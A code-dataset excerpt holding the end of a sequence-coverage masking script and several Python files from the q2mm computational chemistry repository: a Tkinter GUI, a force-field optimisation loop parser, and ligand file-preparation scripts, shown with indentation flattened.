for record in SeqIO.parse(str(cns), "fasta"):
my_record = record
return my_record, len(my_record)
"""
to estimate coverage, for the cns- have a list [0, len(cns)] of counters that
increments by one if there is a read mapped over that site.
Once you have that list, then iterate over the bases in the cns file
and mask any bases as N with lower than X coverage
"""
def get_coverage(paf, cns_len):
coverage=[]
for i in range(cns_len):
coverage.append(0)
with open(paf, "r") as f:
for l in f:
l = l.rstrip("\n")
tokens = l.split("\t")
start,end = int(tokens[7]),int(tokens[8])
map_span = range(start-1, end-1) #triple check this index thing
for i in map_span:
coverage[i]+=1
return coverage
def mask_bases(coverage_list, cns_seq, min_coverage):
masked_seq = ""
for coverage,base in zip(coverage_list, cns_seq):
if coverage >= min_coverage:
masked_seq += base
else:
masked_seq += 'N'
return masked_seq
if __name__ == '__main__':
args = parse_args()
cns, cns_len = load_cns(args.cns)
coverage = get_coverage(args.paf,cns_len)
masked_seq = mask_bases(coverage, cns.seq, args.min_coverage)
with open(str(args.masked_cns), "w") as fw:
fw.write(">{}\n{}\n".format(cns.description, masked_seq))
```
|
{
"source": "jesswahlers/q2mm",
"score": 3
}
|
#### File: q2mm/q2mm/gui.py
```python
from tkinter import *
from tkinter import messagebox, filedialog, Menu
import tkinter.ttk as ttk
#from tkinter.ttk import *
import os
import constants as co
#os.chdir(os.path.dirname(__file__))
class q2mm_gui():
def __init__(self):
self.anchor = W
self.cur_dir = os.getcwd()
self.path = ["","","","",""] # ff file, qparam.txt, init_comparison, final ff file, fin_comparison
self.weights = []
#co.WEIGHTS
self.qm_soft = [None,None,None,None,None,None,None]
self.mm_soft = [None,None,None,None,None,None,None]
self.open_f = None
self.save_f = None
self.commands = "DIR aa \nFFLD read bb \nWGHT cc \nPARM dd \nRDAT ee \nCDAT ff \nCOMP gg \nLOOP hh \nGRAD\nEND\nFFLD write ii \nCDAT\nCOMP jj "
# self.temp_commands = self.commands
self.font = "Helvetica 14 "
self.output = ""
self.FF = [("MM2",1),("MM3",2),("AMOEBA09",3)]
self.QM = [("B3LYP",1),("PBE",2)]
self.BAS = [("6-311G*",1),("6-31G",2)]
self.CAL = [("Energy",1),("Force",2),("Hessian",3)]
self.PRO = [("Gaussian",1),("PySCF",2)]
self.LOS = [("Original",1),("Energy",2)]
self.window()
def window(self):
win = Tk()
# win.option_add("*Dialog.msg.font","Helvetica")
self.menu(win)
win.grid_rowconfigure(1, weight=1)
win.grid_columnconfigure(0,weight=1)
frame1 = Frame(win,width=160, height=45,relief=RIDGE,bg="red")
frame1.grid(row=0,column=0)
frame2 = Frame(win,relief=FLAT,width=160, height=45,bg="cyan")
frame2.grid(row=2,column=0)
frame3 = Frame(win,relief=RIDGE,width=160, height=45,bg="white")
frame3.grid(row=0,column=1)
# self.content(win)
self.soft_frame(frame1)
self.file_frame(frame2)
self.weights_frame(frame3)
win.mainloop()
def menu(self,win):
menu = Menu(win)
win.config(menu=menu)
filemenu = Menu(menu)
# adding File menu
menu.add_cascade(label="File", menu=filemenu)
# options under Filemenu
filemenu.add_command(label="New", command=self.newfile)
filemenu.add_command(label="Open...", command= lambda inp = (("q2mm files","*.in"),("allfiles","*.*")): self.openfile(inp))
filemenu.add_separator()
filemenu.add_command(label="Exit", command=win.quit)
# Help menu
helpmenu = Menu(menu)
menu.add_cascade(label="Help", menu=helpmenu)
helpmenu.add_command(label="About...", command=self.about)
def file_frame(self,win):
return
def weights_frame(self,win):
cur_row = 0
cur_col = 0
weights = ["Weights"]
for val in co.WEIGHTS:
weights.append(val)
for r in weights:
Label(win,text=r, relief=FLAT,width=10).grid(row=cur_row,column=cur_col)
cur_row += 1
cur_row = 0
cur_col += 1
for val in co.WEIGHTS:
fv = StringVar()
fv.set(str(co.WEIGHTS[val]))
cur_row += 1
weight = Spinbox(win, from_=0, to=200, width=10, format="%10.2f", textvariable=fv)
weight.grid(row=cur_row, column=cur_col)
self.weights.append(weight)
def soft_frame(self,win):
col = 0
row = 0
col += 1
row += 1
cur_row = row
options = ["Method","Quantum Mechanics","Files","Molecular Mechanics","Files","Options"]
for r in options:
Label(text=r, relief=RIDGE,width=20).grid(row=cur_row,column=0)
cur_row += 1
options = ["Charge","Energy","Bond","Angle","Torsion","Hessian","EigenMatrix"]
var = []
checks = []
cur_row = row
cur_col = 1
for c in options:
# Label
temp_var = BooleanVar(0)
temp_check = Checkbutton(win,text=c, width=20, variable=temp_var).grid(row=cur_row, column=cur_col)
cur_col += 1
var.append(temp_var)
checks.append(temp_check)
# QUANTUM MECHANICS
cur_row = row+1
cur_col = 1
qm_options = ["Jaguar","Gaussian","Qchem"]
i = 0
checkboxs = []
for c in options:
cb = ttk.Combobox(win,values=qm_options)
self.qm_soft[i] = cb
#if var[i].get():
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
cur_col += 1
i += 1
checkboxs.append(cb)
# FILE CALL
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("Gaussian output files","*.log"),("all files","*.*")): self.openfile(inp))
qf.grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# MOLECULAR MECHANICS
row += 1
cur_row = row+1
cur_col = 1
mm_options = ["MacroModel","Tinker","Amber"]
i = 0
for c in options:
cb = ttk.Combobox(win,values=mm_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
self.mm_soft[i] = cb
cur_col += 1
i += 1
# File Call
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("all files","*.*")): self.openfile(inp)).grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# Option for Charge
row += 1
cur_row = row+1
cur_col = 1
charge_options = ["Partial charge","Partial charge(no H)","Partial charge sum"] # q,qh,qa
cb = ttk.Combobox(win,values=charge_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
# Option for Energy
cur_col += 1
energy_options = ["Pre-opt energy","Average energy","Post-opt energy"] # e,ea,eao
cb = ttk.Combobox(win,values=energy_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
return
def opt_frame(self,win):
return
def content(self,win):
commands = self.commands
col = 0
row = 0
cur_col = col
cur_row = row
Button(win, text="Working Directory", width=20, command = lambda inp=0: self.directory(inp)).grid(row=cur_row, column=cur_col)
# working directory (DIR) aa
row += 1
cur_col = col
cur_row = row
Button(win, text="Open force field file", command=lambda inp=(("Macromodel ff parameters","*.fld"),("Tinker ff parameters","*.prm"),("Amber ff parameters","*.*"),("all file","*.*")):self.openfile(inp,0),width=20).grid(row=cur_row, column=cur_col)
Button(win, text="Preview ff file", command=lambda inp=0: self.view_file(inp), width=20).grid(row=cur_row,column=cur_col+1)
# commands += "DIR "+path
# load forcefield file (FFLD read) bb
# commands += "\nFFLD read "+path
# load qparam file (PARM)
# reference
# calculation
col += 1
row += 1
cur_row = row
options = ["Method","Quantum Mechanics","Files","Molecular Mechanics","Files","Options"]
for r in options:
Label(text=r, relief=RIDGE,width=20).grid(row=cur_row,column=0)
cur_row += 1
options = ["Charge","Energy","Bond","Angle","Torsion","Hessian","EigenMatrix"]
var = []
checks = []
cur_row = row
cur_col = 1
for c in options:
# Label
temp_var = BooleanVar(0)
temp_check = Checkbutton(win,text=c, width=20, variable=temp_var).grid(row=cur_row, column=cur_col)
cur_col += 1
var.append(temp_var)
checks.append(temp_check)
# QUANTUM MECHANICS
cur_row = row+1
cur_col = 1
qm_options = ["Jaguar","Gaussian","Qchem"]
i = 0
checkboxs = []
for c in options:
cb = Combobox(win,values=qm_options)
self.qm_soft[i] = cb
#if var[i].get():
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
cur_col += 1
i += 1
checkboxs.append(cb)
# FILE CALL
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("Gaussian output files","*.log"),("all files","*.*")): self.openfile(inp))
qf.grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# MOLECULAR MECHANICS
row += 1
cur_row = row+1
cur_col = 1
mm_options = ["MacroModel","Tinker","Amber"]
i = 0
for c in options:
cb = Combobox(win,values=mm_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
self.mm_soft[i] = cb
cur_col += 1
i += 1
# File Call
row += 1
cur_row = row+1
cur_col = 1
qm_files = []
for c in options:
qf=Button(win, text="Load", width=20,command=lambda inp=(("MAE files","*.mae"),("all files","*.*")): self.openfile(inp)).grid(row=cur_row, column=cur_col)
cur_col += 1
qm_files.append(qf)
# Option for Charge
row += 1
cur_row = row+1
cur_col = 1
charge_options = ["Partial charge","Partial charge(no H)","Partial charge sum"] # q,qh,qa
cb = Combobox(win,values=charge_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
# Option for Energy
cur_col += 1
energy_options = ["Pre-opt energy","Average energy","Post-opt energy"] # e,ea,eao
cb = Combobox(win,values=energy_options)
cb.grid(row=cur_row, column=cur_col)
cb.current(0)
# No Option for Bond, Angle, torsion
# Weights
self.weight_param(win,cur_row)
# bond_options = []
# eigenmatrix options for m changed by matching software
# Convergence (LOOP)
# name the final forcefield file(FFLD write)
# run
row = cur_row + 2
self.checks = checks
self.var = var
Button(win, text="Debug", command=self.debug).grid(row=row,column=0)
row += 1
Button(win, text="Preview Q2MM Input File", command=self.preview).grid(row=row,column=0)
row += 1
Button(win, text="Save", command=self.debug,width=20).grid(row=row,column=0)
Button(win, text="Run", command=self.debug,width=20).grid(row=row,column=1)
Button(win, text="Quit", command=win.quit,width=20).grid(row=row,column=2)
return
# DEBUG
def debug(self):
for i in self.var:
print(i.get())
# for i in self.qm_soft:
# print(i.get())
# for i in self.mm_soft:
# print(i.get())
for i in range(len(self.var)):
var = self.var[i].get()
print(i,var)
if var:
print(self.qm_soft[i].get())
print(self.mm_soft[i].get())
for i in self.weights:
print(i.get())
def view_file(self,n):
f = open(self.path[n],"r")
messagebox.showinfo("Preview",f.read())
#Text("1.0",f.read())
def weight_param(self,win,row):
cur_row = 0
cur_col = 9
weights = ["Weights"]
for val in co.WEIGHTS:
weights.append(val)
for r in weights:
Label(text=r, relief=FLAT,width=20).grid(row=cur_row,column=cur_col)
cur_row += 1
cur_row = 0
cur_col += 1
for val in co.WEIGHTS:
fv = StringVar()
fv.set(str(co.WEIGHTS[val]))
cur_row += 1
weight = Spinbox(win, from_=0, to=200, width=20, format="%10.2f", textvariable=fv)
weight.grid(row=cur_row, column=cur_col)
self.weights.append(weight)
return
def preview(self):
aa = "" #DIR
bb = "" #FFLD read
cc = "" #WGHT
dd = "" #PARM
ee = "" #RDAT
ff = "" #CDAT
gg = "" #COMP
hh = "" #LOOP
ii = "" #FFLD write
jj = "" #COMP
if self.var[0].get():
# read QM
# read MM
# read options
# read files loaded
# add lines to ee, ff
0
messagebox.showinfo("Q2MM Input File Preview", self.commands)
print("COMMANDS:")
# OS related functions
def directory(self,n):
self.cur_dir = filedialog.askdirectory(title="Select working directory")
def newfile(self):
print("Reset all variables")
def openfile(self, filetype,n):
path = filedialog.askopenfilename(initialdir=self.cur_dir, title="Select file",filetypes=filetype)
self.path[n] = path
def openfiles(self, filetype):
paths = filedialog.askopenfilenames(initialdir=self.cur_dir, title="Select file",filetypes=filetype)
def about(self):
print("Q2MM is ")
q2mm_gui()
```
#### File: q2mm/q2mm/loop.py
```python
from __future__ import absolute_import
from __future__ import division
import argparse
import glob
import logging
import logging.config
import numpy as np
import os
import random
import sys
import re
import calculate
import compare
import constants as co
import datatypes
import gradient
import opt
import parameters
import simplex
logger = logging.getLogger(__name__)
class Loop(object):
def __init__(self):
self.convergence = 0.01
self.cycle_num = 0
self.direc = '.'
self.ff = None
self.ff_lines = None
self.args_ff = None
self.args_ref = None
self.loop_lines = None
self.ref_data = None
def opt_loop(self):
"""
Iterator for cycling through optimization methods.
Will continue to run the loop optimization methods until the convergence
criterion has been met.
Updates the user with logs on the optimization score changes. Backs up
the FF after each loop cycle.
"""
change = None
last_score = None
# This additional check ensures that the code won't crash if the user
# forgets to add a COMP command in the loop input file.
if self.ff.score is None:
logger.warning(
' -- No existing FF score! Please ensure use of COMP in the '
'input file! Calculating FF score automatically to compensate.')
self.ff.score = compare.compare_data(
self.ref_data, self.ff.data)
while last_score is None \
or change is None \
or change > self.convergence:
self.cycle_num += 1
last_score = self.ff.score
self.ff = self.run_loop_input(
self.loop_lines, score=self.ff.score)
logger.log(1, '>>> last_score: {}'.format(last_score))
logger.log(1, '>>> self.ff.score: {}'.format(self.ff.score))
change = (last_score - self.ff.score) / last_score
pretty_loop_summary(
self.cycle_num, self.ff.score, change)
# MM3* specific. Will have to be changed soon to allow for expansion
# into other FF software packages.
mm3_files = glob.glob(os.path.join(self.direc, 'mm3_???.fld'))
if mm3_files:
mm3_files.sort()
most_recent_mm3_file = mm3_files[-1]
most_recent_mm3_file = most_recent_mm3_file.split('/')[-1]
most_recent_num = most_recent_mm3_file[4:7]
num = int(most_recent_num) + 1
mm3_file = 'mm3_{:03d}.fld'.format(num)
else:
mm3_file = 'mm3_001.fld'
mm3_file = os.path.join(self.direc, mm3_file)
self.ff.export_ff(path=mm3_file)
logger.log(20, ' -- Wrote best FF to {}'.format(mm3_file))
for param in self.ff.params:
param.value_at_limits()
return self.ff
def run_loop_input(self, lines, score=None):
lines_iterator = iter(lines)
while True:
try:
line = next(lines_iterator)
except StopIteration:
return self.ff
cols = line.split()
if cols[0] == 'DIR':
self.direc = cols[1]
if cols[0] == 'FFLD':
# Import FF data.
if cols[1] == 'read':
if cols[2] == 'mm3.fld':
self.ff = datatypes.MM3(os.path.join(self.direc,
cols[2]))
if 'prm' in line:
self.ff = datatypes.TinkerFF(os.path.join(self.direc,
cols[2]))
if 'frcmod' in line:
self.ff = datatypes.AmberFF(os.path.join(self.direc,
cols[2]))
self.ff.import_ff()
self.ff.method = 'READ'
with open(os.path.join(self.direc, cols[2]), 'r') as f:
self.ff.lines = f.readlines()
# Export FF data.
if cols[1] == 'write':
self.ff.export_ff(os.path.join(self.direc, cols[2]))
# Trim parameters.
if cols[0] == 'PARM':
logger.log(20, '~~ SELECTING PARAMETERS ~~'.rjust(79, '~'))
self.ff.params = parameters.trim_params_by_file(
self.ff.params, os.path.join(self.direc, cols[1]))
if cols[0] == 'LOOP':
# Read lines that will be looped over.
inner_loop_lines = []
line = next(lines_iterator)
while line.split()[0] != 'END':
inner_loop_lines.append(line)
line = next(lines_iterator)
# Make loop object and populate attributes.
loop = Loop()
loop.convergence = float(cols[1])
loop.direc = self.direc
loop.ff = self.ff
loop.args_ff = self.args_ff
loop.args_ref = self.args_ref
loop.ref_data = self.ref_data
loop.loop_lines = inner_loop_lines
# Log commands.
pretty_loop_input(
inner_loop_lines, name='OPTIMIZATION LOOP',
score=self.ff.score)
# Run inner loop.
self.ff = loop.opt_loop()
# Note: Probably want to update this to append the directory given
# by the new DIR command.
if cols[0] == 'RDAT':
logger.log(
20, '~~ CALCULATING REFERENCE DATA ~~'.rjust(79, '~'))
if len(cols) > 1:
self.args_ref = ' '.join(cols[1:]).split()
self.ref_data = opt.return_ref_data(self.args_ref)
if cols[0] == 'CDAT':
logger.log(
20, '~~ CALCULATING FF DATA ~~'.rjust(79, '~'))
if len(cols) > 1:
self.args_ff = ' '.join(cols[1:]).split()
self.ff.data = calculate.main(self.args_ff)
if cols[0] == 'COMP':
# Deprecated
# self.ff.score = compare.compare_data(
# self.ref_data, self.ff.data)
# if '-o' in cols:
# compare.pretty_data_comp(
# self.ref_data,
# self.ff.data,
# os.path.join(self.direc, cols[cols.index('-o') + 1]))
# if '-p' in cols:
# compare.pretty_data_comp(
# self.ref_data,
# self.ff.data,
# doprint=True)
output = False
doprint = False
r_dict = compare.data_by_type(self.ref_data)
c_dict = compare.data_by_type(self.ff.data)
r_dict, c_dict = compare.trim_data(r_dict,c_dict)
if '-o' in cols:
output = os.path.join(self.direc, cols[cols.index('-o') +1])
if '-p' in cols:
doprint = True
self.ff.score = compare.compare_data(
r_dict, c_dict, output=output, doprint=doprint)
if cols[0] == 'GRAD':
grad = gradient.Gradient(
direc=self.direc,
ff=self.ff,
ff_lines=self.ff.lines,
args_ff=self.args_ff)
#### Should probably just write a function instead of looping
#### this for every gradient method. This includes everything
#### between the two lines of #. TR 20180112
##############################################################
for col in cols[1:]:
if "lstsq" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_lstsq=True
elif arg == False:
grad.do_lstsq=False
if 'radii' in arg:
grad.lstsq_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals == "None":
grad.lstsq_radii = None
else:
for val in radii_vals:
grad.lstsq_radii.append(float(val))
if 'cutoff' in arg:
grad.lstsq_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals == "None":
grad.lstsq_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.lstsq_cutoff.append(float(val))
elif "newton" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_newton=True
elif arg == False:
grad.do_newton=False
if 'radii' in arg:
grad.newton_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.newton_radii = None
else:
for val in radii_vals:
grad.newton_radii.append(float(val))
if 'cutoff' in arg:
grad.newton_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.newton_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.newton_cutoff.append(float(val))
elif "levenberg" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_levenberg=True
elif arg == False:
grad.do_levenberg=False
if 'radii' in arg:
grad.levenberg_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.levenberg_radii = None
else:
for val in radii_vals:
grad.levenberg_radii.append(float(val))
if 'cutoff' in arg:
grad.levenberg_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.levenberg_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.levenberg_cutoff.append(float(val))
if 'factor' in arg:
grad.levenberg_cutoff = []
factor_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if factor_vals=='None':
grad.levenberg_factor = None
else:
for val in factor_vals:
grad.levenberg_factor.append(float(val))
elif "lagrange" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_lagrange=True
elif arg == False:
grad.do_lagrange=False
if 'radii' in arg:
grad.lagrange_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.lagrange_radii = None
else:
for val in radii_vals:
grad.lagrange_radii.append(float(val))
if 'cutoff' in arg:
grad.lagrange_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.lagrange_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.lagrange_cutoff.append(float(val))
if 'factor' in arg:
grad.lagrange_factors = []
factor_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if factor_vals=='None':
grad.lagrange_factors = None
else:
for val in factor_vals:
grad.lagrange_factors.append(float(val))
elif "svd" in col:
g_args = col.split('=')[1].split(',')
for arg in g_args:
if arg == "True":
grad.do_svd=True
elif arg == False:
grad.do_svd=False
if 'radii' in arg:
grad.svd_radii = []
radii_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if radii_vals=='None':
grad.svd_radii = None
else:
for val in radii_vals:
grad.svd_radii.append(float(val))
if 'cutoff' in arg:
grad.svd_cutoff = []
cutoff_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if cutoff_vals=='None':
grad.svd_cutoff = None
else:
if len(cutoff_vals) > 2 or \
len(cutoff_vals) < 2:
raise Exception("Cutoff values must " \
"be between two numbers.")
for val in cutoff_vals:
grad.svd_cutoff.append(float(val))
if 'factor' in arg:
grad.svd_cutoff = []
factor_vals = re.search(
r"\[(.+)\]",arg).group(1).split('/')
if factor_vals=='None':
grad.svd_factor = None
else:
for val in factor_vals:
grad.svd_factor.append(float(val))
else:
raise Exception("'{}' : Not Recognized".format(col))
##############################################################
self.ff = grad.run(ref_data=self.ref_data)
if cols[0] == 'SIMP':
simp = simplex.Simplex(
direc=self.direc,
ff=self.ff,
ff_lines=self.ff.lines,
args_ff=self.args_ff)
for col in cols[1:]:
if "max_params" in col:
simp.max_params = col.split('=')[1]
else:
raise Exception("'{}' : Not Recognized".format(col))
self.ff = simp.run(r_data=self.ref_data)
if cols[0] == 'WGHT':
data_type = cols[1]
co.WEIGHTS[data_type] = float(cols[2])
if cols[0] == 'STEP':
param_type = cols[1]
co.STEPS[param_type] = float(cols[2])
def read_loop_input(filename):
with open(filename, 'r') as f:
lines = f.readlines()
lines = [x.partition('#')[0].strip('\n') for x in lines if
x.partition('#')[0].strip('\n') != '']
pretty_loop_input(lines)
return lines
def pretty_loop_input(lines, name='Q2MM', score=None):
logger.log(20, ' {} '.format(name).center(79, '='))
logger.log(20, 'COMMANDS:')
for line in lines:
logger.log(20, '> ' + line)
if score is not None:
logger.log(20, 'SCORE: {}'.format(score))
logger.log(20, '=' * 79)
logger.log(20, '')
return lines
def pretty_loop_summary(cycle_num, score, change):
logger.log(20, ' Cycle {} Summary '.format(
cycle_num).center(50, '-'))
logger.log(20, '| PF Score: {:36.15f} |'.format(score))
logger.log(20, '| % change: {:36.15f} |'.format(change * 100))
logger.log(20, '-' * 50)
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument(
'input', type=str, help='Filename containing loop commands.')
opts = parser.parse_args(args)
lines = read_loop_input(opts.input)
loop = Loop()
loop.run_loop_input(lines)
if __name__ == '__main__':
# if os.path.isfile('root.log'):
# os.remove('root.log')
logging.config.dictConfig(co.LOG_SETTINGS)
main(sys.argv[1:])
```
#### File: smiles_to_catvs/scripts/prepare.py
```python
import os,glob
from multiprocessing import Pool
import pubchempy as pcp
import requests as rq
import ast
def CID_to_IUPAC(cid):
pre_url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/CID/"
post_url = "/record/SDF/?record_type=3d&response_type=display"
c = pcp.Compound.from_cid(cid)
name = c.iupac_name
if name == None:
return None
else:
return name
center=""" P3-Z0-P3
1
"""
txt1 =""" s_cs_pattern
b_cs_use_substructure
"""
txt2 =""" b_cs_comp
b_cs_chig
"""
txt3 = """ b_cs_tors
i_cs_rca4_1
i_cs_rca4_2
r_cs_torc_a5
r_cs_torc_a6
r_cs_torc_b5
r_cs_torc_b6
i_cs_torc_a1
i_cs_torc_a4
i_cs_torc_b1
i_cs_torc_b4
"""
def prepare_mae_for_screen(file,s_txt):
CID = file.replace(".mae","")
infile = open(file,"r")
flines = infile.readlines()
output = ""
count = 0
b_cs = 0
rca4 = None
rot = None
chiral = None
for line in flines:
if CID in line:
iupac = CID_to_IUPAC(CID)
if iupac == None:
output += line
else:
# output += iupac + "\n"
output += line.replace(CID,iupac.replace(" ",""))
elif "i_m_ct_format" in line:
output += line + txt1
elif "m_atom" in line and count == 0:
output += s_txt + line
count = 1
elif " PD " in line:
numb = line.split()[1]
output += line.replace(" {} ".format(numb)," 62 ")
elif "CHIRAL" in line:
chiral = "".join(line.split()[1:])
chiral = ast.literal_eval(chiral)
elif "RCA4" in line:
rca4 = "".join(line.split()[1:])
rca4 = ast.literal_eval(rca4)
elif "ROT" in line:
rot = "".join(line.split()[1:])
rot = ast.literal_eval(rot)
else:
output += line
old_out = output
output = ""
count = 0
for line in old_out.splitlines():
if "m_atom" in line:
count = 1
output += line
elif count == 1 and ":::" in line:
count = 2
output += txt2 + line
# atom flag
elif count == 2 and ":::" in line:
count = 3
output += line
# bond flag
elif count == 3 and ":::" in line:
count = 4
output += txt3 + line
# turn off
elif count == 4 and ":::" in line:
count = 5
output += line
# atom
elif count == 2:
chi = 0
atidx = int(line.split()[0])
if atidx in chiral:
chi = 1
comp = 1
if "H " in line:
comp = 0
output += line + " {} {}".format(comp,chi)
# bond
elif count == 4:
bond = list(map(int,line.split()[1:3]))
tors = 0
if bond in rot or bond[::-1] in rot:
tors = 1
rca4_1 = 0
rca4_2 = 0
for rca in rca4:
if bond == rca[1:3]:
rca4_1 = rca[0]
rca4_2 = rca[3]
elif bond[::-1] == rca[1:3]:
rca4_1 = rca[3]
rca4_2 = rca[0]
output += line + " {} {} {} 0 0 0 0 0 0 0 0".format(tors,rca4_1,rca4_2)
else:
output += line
output += "\n"
return output
os.system("mkdir ligands")
os.chdir("./maes")
if 1:
for nfile, file in enumerate(glob.glob("*.mae")):
n = nfile + 1
print(file)
text = prepare_mae_for_screen(file,center)
outfile = open("temp","w")
outfile.write(text)
outfile.close()
os.system("cp temp ../ligands/{}.mae".format(str(n)))
def prepare(filenames):
for fn0 in filenames:
text = prepare_mae_for_screen(fn0,center)
fn = fn0.replace(".mae","")
temp = "{}.temp".format(fn)
outfile = open(temp,"w")
outfile.write(text)
outfile.close()
os.system("mv {} ../ligands/{}.mae".format(fn,fn))
return 0
if 0:
fns = glob.glob("*.mae")
# number of threads for parallel job
nt = 32
lf = len(fns)
nj = int(lf/nt)
nr = int(lf%nt)
ni = 0
count = 0
file_split=[]
for i in range(nt-1):
fn = fns[ni:ni+nj]
file_split.append(fn)
count += len(fn)
ni = ni + nj
for i in range(nr):
file_split[i].append(fns[ni+i])
with Pool(processes=nt) as pool:
multiple_jobs = [pool.apply_async(prepare,(files,)) for files in file_split]
[res.get() for res in multiple_jobs]
```
#### File: smiles_to_catvs/scripts/sdf_to_mae.py
```python
import openbabel as ob
import pybel as pb
import numpy as np
import glob, os
import multiprocessing as mp
from multiprocessing import Pool
def bmin_call(file_list):
for filename in file_list:
infile = filename.replace(".com","")
os.system("bmin -WAIT {};".format(infile))
return 0
def cons_opt(infile,outfile,idx):
"""
Only Mol2/UFF can Optimize
Optimize with Pd1-P-P1 constraints
:param infile:
:param outfile:
:param idx:
:return:
"""
p1,p2,pd = idx
conv = ob.OBConversion()
conv.SetInAndOutFormats("mol2", "mol2")
mol = ob.OBMol()
conv.ReadFile(mol, infile)
cons = ob.OBFFConstraints()
pp = 3.2
ppd = 2.4
cons.AddDistanceConstraint(p1, p2, pp)
cons.AddDistanceConstraint(p1, pd, ppd)
cons.AddDistanceConstraint(p2, pd, ppd)
# Set up FF
ff = ob.OBForceField.FindForceField("UFF")
ff.Setup(mol, cons)
ff.SetConstraints(cons)
ff.EnableCutOff(True)
# Optimize
ff.ConjugateGradients(10000)
ff.GetCoordinates(mol)
def ring_bond(ring):
"""
:param ring: OBRing class
:return: list of lists [atom1,atom2]
"""
bonds = []
mol = ring.GetParent()
for bond in ob.OBMolBondIter(mol):
at1 = bond.GetBeginAtom().GetIndex() + 1
at2 = bond.GetEndAtom().GetIndex() + 1
if ring.IsMember(bond):
if not bond.IsAromatic():
bonds.append(sorted([at1,at2]))
return bonds
def common_atom(bond,bonds):
"""
:param bond: list [atom1,atom2]
:param bonds: list of list [atom1,atom2]
:return: True if there is common atom in bonds
"""
result = False
if len(bonds) == 0:
return result
for bond2 in bonds:
for at1 in bond:
for at2 in bond2:
if at1 == at2:
result = True
return result
return result
# extract ring info
# iterate over all bond
# CHIRAL ATOMS
chiral = []
for atom in ob.OBMolAtomIter(mol):
if atom.IsChiral():
chiral.append(atom.GetIndex() + 1)
rot_bond = []
rca4 = []
rca23 = []
for bond in ob.OBMolBondIter(mol):
at1 = bond.GetBeginAtom().GetIndex() + 1
at2 = bond.GetEndAtom().GetIndex() + 1
# print(at1, at2)
if bond.IsRotor() and not bond.IsAromatic():
rot = sorted([at1,at2])
# print(outfile,"ROT ",rot)
rot_bond.append(rot)
if bond.IsClosure():
rca0 = sorted([at1,at2])
rca = sorted([at1,at2])
# The Assumption is IsClosure picking up only one bond in the ring
# and bond.IsRotor() does not provide any ring bonds.
# to prevent rca23 sharing common atoms
if len(rca23) != 0:
if common_atom(rca,rca23):
ringbonds = ring_bond(bond.FindSmallestRing())
for rbond in ringbonds:
if common_atom(rbond,rca23):
continue
else:
rca0 = rbond.copy()
rca = rbond.copy()
break
else:
ringbonds = ring_bond(bond.FindSmallestRing())
for rbond in ringbonds:
if not (rbond[0] in rca or rbond[1] in rca):
rca0 = rbond.copy()
rca = rbond.copy()
break
rca23.append(rca0)
#print(outfile,"RING OPENING BOND", rca0)
ring = bond.FindSmallestRing()
ring_rots = []
if not ring.IsAromatic():
for bond1 in ob.OBMolBondIter(mol):
if ring.IsMember(bond1):
b1 = bond1.GetBeginAtom().GetIndex() + 1
b2 = bond1.GetEndAtom().GetIndex() + 1
rot = sorted([b1,b2])
if rot != rca0:
ring_rots.append(rot)
#print("RING ROT:",ring_rots)
for rrot in ring_rots:
if rca0[0] in rrot:
atom = rrot.copy()
atom.remove(rca0[0])
#print(atom)
rca.insert(0,atom[0])
#print("INSERT ",rca)
elif rca0[1] in rrot:
atom = rrot.copy()
atom.remove(rca0[1])
#print(rca)
rca.append(atom[0])
#print("APPEND ",rca)
elif rca0 != rot:
rot_bond.append(rrot)
rca4.append(rca)
# print(outfile,"CHIRAL",chiral)
